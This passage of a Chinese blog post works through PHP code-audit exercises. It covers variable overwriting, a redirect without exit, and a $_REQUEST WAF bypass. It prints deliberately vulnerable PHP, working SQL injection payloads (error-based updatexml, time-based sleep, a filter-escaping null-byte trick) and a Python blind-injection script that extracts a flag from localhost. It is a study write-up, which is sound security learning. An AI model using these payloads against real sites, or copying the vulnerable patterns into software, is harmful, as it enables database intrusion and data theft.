class="string">        &lt;p&gt;Leave a message: &lt;input type="text" name="msg" /&gt;&lt;input type="submit" value="Submit" /&gt;&lt;/p&gt;</span></span><br><span class="line"><span class="string">    &lt;/form&gt;</span></span><br><span class="line"><span class="string">&lt;/center&gt;</span></span><br><span class="line"><span class="string">EOF;</span></span><br><span class="line">$sql = <span class="string">"SELECT * FROM users"</span>;</span><br><span class="line">$result = $conn-&gt;query($sql);</span><br><span class="line"><span class="keyword">if</span>($result-&gt;num_rows &gt; <span class="number">0</span>)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;center&gt;&lt;table border='1'&gt;&lt;tr&gt;&lt;th&gt;id&lt;/th&gt;&lt;th&gt;message&lt;/th&gt;&lt;tr&gt;&lt;/center&gt;"</span>;</span><br><span class="line">    <span class="keyword">while</span>($row = $result-&gt;fetch_row())&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"&lt;tr&gt;&lt;th&gt;$row[0]&lt;/th&gt;&lt;th&gt;$row[1]&lt;/th&gt;&lt;tr&gt;"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;/table&gt;&lt;/center&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line">$conn-&gt;close();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// function.php</span></span><br><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">replace_bad_word</span><span class="params">($str)</span></span>&#123;</span><br><span class="line">    <span class="keyword">global</span> $limit_words;</span><br><span class="line">    <span class="keyword">foreach</span> ($limit_words <span class="keyword">as</span> $old =&gt; $new) &#123;</span><br><span class="line">        strlen($old) &gt; <span class="number">2</span> &amp;&amp; $str = str_replace($old,trim($new),$str);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> $str;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">convert</span><span class="params">($str)</span></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> htmlentities($str);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$limit_words = <span class="keyword">array</span>(<span class="string">'造反'</span> =&gt; <span class="string">'造**'</span>, <span class="string">'法轮功'</span> =&gt; <span class="string">'法**'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span> (<span class="keyword">array</span>(<span class="string">'_GET'</span>,<span class="string">'_POST'</span>) <span class="keyword">as</span> $method) &#123;</span><br><span class="line">    <span class="keyword">foreach</span> ($$method <span class="keyword">as</span> $key =&gt; $value) &#123;</span><br><span class="line">        $$key = $value;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这边为了复现方便我将所有的<code>POST</code>传参数都改成了<code>GET</code>传参，这题一开始我看的是一脸懵逼，题解看半天看不懂。知道多加了几个<code>echo</code>语句之后，才逐渐清晰了思路。所以。。<code>echo</code>一些变量值，对整理思路有奇效！</p>
<p>首先在<code>function.php</code>存在着变量覆盖的问题。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span> (<span class="keyword">array</span>(<span class="string">'_GET'</span>,<span class="string">'_POST'</span>) <span class="keyword">as</span> $method) &#123;</span><br><span class="line">    <span class="keyword">foreach</span> ($$method <span class="keyword">as</span> $key =&gt; $value) &#123;</span><br><span class="line">        $$key = $value;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>再看看接受参数的部分</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'msg'</span>]) &amp;&amp; $_POST[<span class="string">'msg'</span>] !==<span class="string">''</span>)&#123;</span><br><span class="line">    $msg = addslashes($_POST[<span class="string">'msg'</span>]);</span><br><span class="line">    $msg = replace_bad_word(convert($msg));</span><br><span class="line">    $sql = <span class="string">"INSERT INTO users VALUES($id,'"</span>.$msg.<span class="string">"')"</span>;</span><br><span class="line">    -------------------------------------------------</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">convert</span><span class="params">($str)</span></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> htmlentities($str);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>传入的参数<code>msg</code>经过<strong>addslashes</strong>转义，<strong>htmlentities</strong>实体编码，再替换自定义的非法字符。不得不佩服大佬们的思路，先看看<code>payload</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msg=1%00&apos; and updatexml(1,concat(0x7e,(select * from flag),0x7e),1))#&amp;limit_words[\0\]=</span><br><span class="line">msg=1%00&apos; and updatexml(1,concat(0x7e,(select reverse(flag) from flag),0x7e),1))#&amp;limit_words[\0\]=</span><br></pre></td></tr></table></figure>

<p>利用<strong>变量覆盖</strong>将<code>limit_words[\0\]</code>注册为空。为什么是<code>\0\</code>由于<code>%00</code>进入<code>php</code>之后就被转成了<code>\0</code>又由于<code>&#39;</code>被转义成<code>\&#39;</code>所以拼接出来<code>msg</code>的值是<code>1\0\</code>,又由于经过<code>replace_bad_word</code>函数的替换，导致<code>\0\</code>被替换成空，从而单引号得以逃脱转义。</p>
<p><img src="php-study-1/18.png" alt></p>
<p>这个环境是<code>PHP7</code>，在<code>php5</code>这个<code>payload</code>就不适合了，好像转义的情况变得不一样了。但是这个思路是很值得学习！，这也是第一次意识到变量覆盖的危害，应该是第二次，还有一个是之前写的<strong>删除超全局变量<code>GET</code>再加变量覆盖导致的<code>waf</code>绕过</strong>。</p>
<h2 id="DAY10–程序未及时停止导致的问题"><a href="#DAY10–程序未及时停止导致的问题" class="headerlink" title="DAY10–程序未及时停止导致的问题"></a>DAY10–程序未及时停止导致的问题</h2><p>源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">'config.php'</span>;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">stophack</span><span class="params">($string)</span></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(is_array($string))&#123;</span><br><span class="line">        <span class="keyword">foreach</span>($string <span class="keyword">as</span> $key =&gt; $val) &#123;</span><br><span class="line">            $string[$key] = stophack($val);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        $raw = $string;</span><br><span class="line">        $replace = <span class="keyword">array</span>(<span class="string">"\\"</span>,<span class="string">"\""</span>,<span class="string">"'"</span>,<span class="string">"/"</span>,<span class="string">"*"</span>,<span class="string">"%5C"</span>,<span class="string">"%22"</span>,<span class="string">"%27"</span>,<span class="string">"%2A"</span>,<span class="string">"~"</span>,<span class="string">"insert"</span>,<span class="string">"update"</span>,<span class="string">"delete"</span>,<span class="string">"into"</span>,<span class="string">"load_file"</span>,<span class="string">"outfile"</span>,<span class="string">"sleep"</span>,);</span><br><span class="line">        $string = str_ireplace($replace, <span class="string">"HongRi"</span>, $string);</span><br><span class="line">        $string = strip_tags($string);</span><br><span class="line">        <span class="keyword">if</span>($raw!=$string)&#123;</span><br><span class="line">            error_log(<span class="string">"Hacking attempt."</span>);</span><br><span class="line">            header(<span class="string">'Location: /error/'</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> trim($string);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$conn = <span class="keyword">new</span> mysqli($servername, $username, $password, $dbname);</span><br><span class="line"><span class="keyword">if</span> ($conn-&gt;connect_error) &#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"连接失败: "</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'id'</span>]) &amp;&amp; $_GET[<span class="string">'id'</span>])&#123;</span><br><span class="line">    $id = stophack($_GET[<span class="string">'id'</span>]);</span><br><span class="line">    $sql = <span class="string">"SELECT * FROM students WHERE id=$id"</span>;</span><br><span class="line">	<span class="keyword">echo</span> $sql;</span><br><span class="line">    $result = $conn-&gt;query($sql);</span><br><span class="line">    <span class="keyword">if</span>($result-&gt;num_rows &gt; <span class="number">0</span>)&#123;</span><br><span class="line">	<span class="comment">//	echo "error";</span></span><br><span class="line">        $row = $result-&gt;fetch_assoc();</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;center&gt;&lt;h1&gt;查询结果为：&lt;/h1&gt;&lt;pre&gt;'</span>.<span class="string">&lt;&lt;&lt;EOF</span></span><br><span class="line"><span class="string">        +----+---------+--------------------+-------+</span></span><br><span class="line"><span class="string">        | id | name    | email              | score |</span></span><br><span class="line"><span class="string">        +----+---------+--------------------+-------+</span></span><br><span class="line"><span class="string">        |  <span class="subst">&#123;$row['id']&#125;</span> | <span class="subst">&#123;$row['name']&#125;</span>   | <span class="subst">&#123;$row['email']&#125;</span>   |   <span class="subst">&#123;$row['score']&#125;</span> |</span></span><br><span class="line"><span class="string">        +----+---------+--------------------+-------+&lt;/center&gt;</span></span><br><span class="line"><span class="string">EOF;</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">die</span>(<span class="string">"你所查询的对象id值不能为空！"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>可以要看到，是有做<code>sql注入过滤</code>，但是过滤并不严格</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> <span class="keyword">if</span>(length((table_name from information_schema.tables where table_schema=database() limit <span class="number">0</span>,<span class="number">1</span>,))&gt;<span class="number">1</span>,sleep(<span class="number">5</span>),<span class="number">0</span>) %<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p>以上<code>payload</code>不会触发过滤这里如何绕过<code>sql</code>不是我想考虑的重点，重点是<strong>程序没有及时退出的产生的问题</strong>，所以我先把<code>sleep</code>函数先移除过滤，方便测试。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>($raw!=$string)&#123;</span><br><span class="line">           error_log(<span class="string">"Hacking attempt."</span>);</span><br><span class="line">           header(<span class="string">'Location: /error/'</span>);</span><br><span class="line">       &#125;</span><br></pre></td></tr></table></figure>

<p>当检测到<code>非法字符</code>的时候，页面跳转到<code>error</code>页面。</p>
<p>但是，程序并没有停止。。而是继续往下执行了。 这边做个小测试，比较直观</p>
<p><img src="php-study-1/19.png" alt></p>
<p>在执行<code>sql</code>语句后加入一句跳转到<code>yes</code>，也就是。原本匹配到非法字符是跳转到<code>error</code>，但是由于程序并没有结束，语句继续执行，导致<code>sql</code>语句还是被带入数据库中查询，而能够执行到<code>跳转yes</code>的语句，就证明了<code>sql</code>语句以及被执行了。</p>
<p>但是，其实既然能绕过<code>waf</code>就意味着不会执行跳转到<code>error</code>页面。而如果无法绕过过滤，导致<code>sql</code>语句因为替换而变形，就算带入数据库，也无法猜解数据库数据。（个人分析，不知道正确否）</p>
<p><img src="php-study-1/20.png" alt></p>
<p>上图显示的是<code>sleep</code>被替换了,导致语句无法执行。关于代替<code>sleep</code>的注入语句还有别的，这边先<code>mark</code>之后再学习。<strong><a href="https://xz.aliyun.com/t/2288" target="_blank" rel="noopener">mysql 延时注入新思路</a></strong> 。再贴上<code>红日安全</code>写的注入脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> sys, string, requests</span><br><span class="line"></span><br><span class="line">version_chars = <span class="string">".-&#123;&#125;_"</span> + string.ascii_letters + string.digits + <span class="string">'#'</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">40</span>):</span><br><span class="line">    <span class="keyword">for</span> char <span class="keyword">in</span> version_chars:</span><br><span class="line">        payload = <span class="string">"-1 or if(ascii(mid((select flag from flag),%s,1))=%s,benchmark(200000000,7^3^8),0)"</span> % (i,ord(char))</span><br><span class="line">        url = <span class="string">"http://localhost/index.php?id=%s"</span> % payload</span><br><span class="line">        <span class="keyword">if</span> char == <span class="string">'#'</span>:</span><br><span class="line">            <span class="keyword">if</span>(flag):</span><br><span class="line">                sys.stdout.write(<span class="string">"\n[+] The flag is： %s"</span> % flag)</span><br><span class="line">                sys.stdout.flush()</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                print(<span class="string">"[-] Something run error!"</span>)</span><br><span class="line">            exit()</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            r = requests.post(url=url, timeout=<span class="number">2.0</span>)</span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            flag += char</span><br><span class="line">            sys.stdout.write(<span class="string">"\r[-] Try to get flag： %s"</span> % flag)</span><br><span class="line">            sys.stdout.flush()</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">print(<span class="string">"[-] Something run error!"</span>)</span><br></pre></td></tr></table></figure>

<p>观察脚本的<code>payload</code>也可以发现，成功绕过了<code>waf</code>，并不会跳转到<code>error</code>页面。</p>
<h2 id="DAY11"><a href="#DAY11" class="headerlink" title="DAY11"></a>DAY11</h2><p>这篇篇幅有点长，反序列化的问题，有必要单独写一下。</p>
<h2 id="DAY12–反斜杠导致单引号注入和REQUEST引起的waf绕过"><a href="#DAY12–反斜杠导致单引号注入和REQUEST引起的waf绕过" class="headerlink" title="DAY12–反斜杠导致单引号注入和REQUEST引起的waf绕过"></a>DAY12–反斜杠导致单引号注入和REQUEST引起的waf绕过</h2><p>题目源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require</span> <span class="string">'db.inc.php'</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_REQUEST[<span class="string">'username'</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">"/(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)/i"</span>, $_REQUEST[<span class="string">'username'</span>]))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"Attack detected!!!"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_REQUEST[<span class="string">'password'</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">"/(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)/i"</span>, $_REQUEST[<span class="string">'password'</span>]))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"Attack detected!!!"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">clean</span><span class="params">($str)</span></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(get_magic_quotes_gpc())&#123;</span><br><span class="line">        $str=stripslashes($str);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> htmlentities($str, ENT_QUOTES);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$username = @clean((string)$_GET[<span class="string">'username'</span>]);</span><br><span class="line">$password = @clean((string)$_GET[<span class="string">'password'</span>]);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$query=<span class="string">'SELECT * FROM ctf.users WHERE name=\''</span>.$username.<span class="string">'\' AND pass=\''</span>.$password.<span class="string">'\';'</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">#echo $query;</span></span><br><span class="line"></span><br><span class="line">$result=mysql_query($query);</span><br><span class="line"><span class="keyword">while</span>($row = mysql_fetch_array($result))</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;tr&gt;"</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;td&gt;"</span> . $row[<span class="string">'name'</span>] . <span class="string">"&lt;/td&gt;"</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;/tr&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>代码逻辑很简单，接受<code>username</code>和<code>password</code>并且对其进行过滤。这个正则写的挺复杂，菜鸟看不懂。。大概就是过滤了，<code>union</code>、<code>or</code>、<code>where</code>之类的关键字，由于不能够理解正则，也就没办法从正则不严格的方面入手。而这题的考点，我猜测也不是正则吧。</p>
<p>关键点，<strong>反斜杠的遗漏导致单引号逃逸转义</strong>和<strong>接受参数时方法和<code>waf</code>接受参数的方法不一致产生的问题</strong></p>
<p>关于<code>反斜杠</code>的问题之前博客已经写过了，这边就不赘述。<a href="https://zhhhy.github.io/2018/10/17/maccms/" target="_blank" rel="noopener">传送门</a><br>关注一下第二个问题。这边<code>get</code>到一个新知识。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_REQUEST[<span class="string">'username'</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">"/(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)/i"</span>, $_REQUEST[<span class="string">'username'</span>]))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"Attack detected!!!"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>首先参数被传递进来的时候就已经接受过滤，注意这里的接受方法是<code>$_REQUEST</code>，而php中 <a href="http://php.net/manual/zh/reserved.variables.request.php" target="_blank" rel="noopener">REQUEST</a> 变量默认情况下包含了 <strong>GET</strong> ，<strong>POST</strong> 和 <strong>COOKIE</strong> 的数组。</p>
<blockquote>
<blockquote>
<p>在 <strong>php.ini</strong> 配置文件中，有一个参数 <strong>variables_order</strong> ，这参数有以下可选项目</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&gt; &gt; ; variables_order</span><br><span class="line">&gt; &gt; ;   Default Value: &quot;EGPCS&quot;</span><br><span class="line">&gt; &gt; ;   Development Value: &quot;GPCS&quot;</span><br><span class="line">&gt; &gt; ;   Production Value: &quot;GPCS&quot;</span><br><span class="line">&gt; &gt;</span><br></pre></td></tr></table></figure>
</blockquote>
</blockquote>
<blockquote>
<p>这些字母分别对应的是 <strong>E: Environment</strong> ，<strong>G:Get</strong>，<strong>P:Post</strong>，<strong>C:Cookie</strong>，<strong>S:Server</strong>。这些字母的出现顺序，表明了数据的加载顺序。而 <strong>php.ini</strong> 中这个参数默认的配置是 <strong>GPCS</strong> ，也就是说如果以 <strong>POST</strong> 、 <strong>GET</strong> 方式传入相同的变量，那么用 <strong>REQUEST</strong> 获取该变量的值将为 <strong>POST</strong> 该变量的值。</p>
</blockquote>
<p>做个小实验</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$username =$_REQUEST[<span class="string">'username'</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>,$username,<span class="string">"&lt;br&gt;"</span>;</span><br></pre></td></tr></table></figure>

<p><img src="php-study-1/21.png" alt></p>
<p>说明了当传入的参数名相同时<code>GET</code>的值会被<code>POST</code>的值覆盖掉</p>
<p>那么这题的就可以用这种方法绕过正则，导致正则无效。<code>payload</code>如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">username=\&amp;password=union select * from ctf.user%<span class="number">23</span>;</span><br><span class="line">同时POST</span><br><span class="line">username=aaa&amp;password=bbb</span><br></pre></td></tr></table></figure>

<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>复现完这些问题，学习到不少知识。除去三篇没有成功复现的，从九篇里感受到了安全问题真是无处不在。有时候，按照正常人的思路怎么会想到这种天马行空的<code>payload</code>，审计这些题目的时候，总感觉头皮发麻，也可能是缺乏开发经验，看到大篇幅的代码的时候有些手足无措。。这也是没有去复现day11的原因。。道阻且长。。现在这停一停，比较信息量还是很大的，而且ＣＭＳ也还没开始复现，一切似乎还在计划之中。</p>

        </section>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>zhhhy</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://yoursite.com/2018/11/09/php-study-1/">http://yoursite.com/2018/11/09/php-study-1/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Solgan:</span>
                         <span>Do you believe in <strong>DESTINY<strong>?</strong></strong></span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2018/11/14/Serialize/">Serialize</a>
            
            
            <a class="next" rel="next" href="/2018/11/09/moctf/">MOCTF-WEB部分</a>
            
        </section>


    </article>
</div>
        </div>
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© zhhhy | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Sirice19/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>
    </div>
</body>
</html>